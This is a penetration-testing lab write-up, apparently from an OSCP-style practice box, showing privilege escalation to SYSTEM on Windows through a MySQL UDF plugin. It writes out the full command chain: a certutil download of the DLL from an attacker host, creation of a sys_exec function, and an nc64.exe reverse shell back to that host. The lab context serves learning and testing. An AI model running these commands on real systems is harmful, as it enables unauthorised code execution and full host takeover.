MySQL User Defined Functions

It has been identified that the target MySQL instance is running with privileges of SYSTEM. Read and write access have been confirmed. Additionally, code execution or privilege escalation is achievable via the UDF exploit,

Exploit

Found this repository that contains UDF plugins for MySQL

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/squid/mysql_udf]
└─$ wget -q https://github.com/yanghaoi/lib_mysqludf_sys/releases/download/0.01/Release.zip ; unzip Release.zip 
Archive:  Release.zip
 extracting: Release-20220330.zip    
  inflating: Release-20220331.zip    
 extracting: Release-20211228.zip    
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/squid/mysql_udf]
└─$ unzip Release-20220330.zip    
Archive:  Release-20220330.zip
  inflating: lib_mysqludf_sys_x64.dll

I will extract the most recent one; lib_mysqludf_sys_x64.dll

Exploitation

show variables like '%plugin%'

First, I need to check the plugin directory; C:\wamp\bin\mysql\mysql5.7.31\lib\plugin\

PS C:\wamp\bin\mysql\mysql5.7.31\lib\plugin> icacls C:\wamp\bin\mysql\mysql5.7.31\lib\plugin
C:\wamp\bin\mysql\mysql5.7.31\lib\plugin Everyone:(OI)(CI)(F)
                                         Everyone:(I)(OI)(CI)(F)
                                         NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                         BUILTIN\Administrators:(I)(OI)(CI)(F)
                                         BUILTIN\Users:(I)(OI)(CI)(RX)
                                         BUILTIN\Users:(I)(CI)(AD)
                                         BUILTIN\Users:(I)(CI)(WD)
                                         CREATOR OWNER:(I)(OI)(CI)(IO)(F)
 
Successfully processed 1 files; Failed processing 0 files

The current user is able to write to the plugin directory; C:\wamp\bin\mysql\mysql5.7.31\lib\plugin

PS C:\wamp\bin\mysql\mysql5.7.31\lib\plugin> cmd /c certutil.exe -urlcache -split -f http://192.168.45.157/mysql_udf/lib_mysqludf_sys_x64.dll .\lib_mysqludf_sys_x64.dll
****  Online  ****
  000000  ...
  02f200
CertUtil: -URLCache command completed successfully.

Transferring the UDF plugin; lib_mysqludf_sys_x64.dll

CREATE function sys_exec returns string soname "lib_mysqludf_sys_x64.dll"

Then I can create a function, sys_exec from the lib_mysqludf_sys_x64.dll plugin

SELECT sys_exec("whoami > C:\\tmp\\out.txt")

PS C:\tmp> cat C:\tmp\out.txt
nt authority\system

Code execution confirmed

SELECT sys_exec("C:\\tmp\\nc64.exe 192.168.45.157 1234 -e powershell")

Sending a reverse shell

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/squid]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.157] from (UNKNOWN) [192.168.135.189] 51652
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
PS C:\wamp\bin\mysql\mysql5.7.31\data> whoami
whoami
nt authority\system
PS C:\wamp\bin\mysql\mysql5.7.31\data> hostname
hostname
SQUID
PS C:\wamp\bin\mysql\mysql5.7.31\data> ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.135.189
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.135.254

System level compromise

InfoSec LAB

Explorer

Squid_Privilege_Escalation_2

MySQL User Defined Functions

Exploit

Exploitation

Interactive Graph View

Table of Contents

Backlinks